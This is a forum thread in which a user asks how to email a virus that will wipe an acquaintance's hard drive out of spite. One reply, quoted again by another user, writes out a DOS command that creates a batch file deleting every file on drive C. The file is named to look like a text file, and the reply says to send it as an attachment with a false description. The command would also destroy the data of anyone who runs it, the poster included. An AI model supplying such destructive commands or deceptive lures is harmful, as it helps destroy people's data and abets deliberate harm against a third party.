How to send a virus? (1 Viewer)

0rganDonor

Dragged n Dropped...
Simplest way with best results?

I've been Googling around but keep reading loads of shit I have no clue about! Basically need it in layman's terms... a beginners guide to sending a virus, if you will...

I am sure that someone here can help you.

I just tried to give ya a laugh. :shrug: :hatsoff:. I'm positive if you contact the "smart" people at this site they might be able to help you.

But they will ask why ? Like I am

0rganDonor

Dragged n Dropped...
She (a friend of mine) just wants to send something a bit naughty via email to someone who has pissed her off in a big way. Nothing extreme like phishing any sort of account details, just something that will wipe a HDD or basically cause a nuisance.

there was a site that I went on my mom's computer that caused a virus and she had to buy a new one :mybad:, but I can't remember the name of it though

D.O.A.

These are great days we're living, bros
open dos prompt, type:
echo del c:\*.* /s /y > c:\TOTALLYNOTAVIRUS.TXT.BAT
double-click the new file in c:
send that as an attachment
tell 'em it's a picture of your penis
pow

wait wat did you get them to write to the file, then double click ~ execute it, or am I missing something :confused:

D.N.R.

Medication time
open dos prompt, type:
echo del c:\*.* /s /y > c:\TOTALLYNOTAVIRUS.TXT.BAT
double-click the new file in c:
send that as an attachment
tell 'em it's a picture of your penis
pow
I will never open another email claiming to contain pen0r pics from anyone here again.

I

Ivan Drago

If you want to send a virus to a pal simply befriend a jobless scrounging cunt and tell him to knock on your pals door, voila....you sent a virus.

Users who are viewing this thread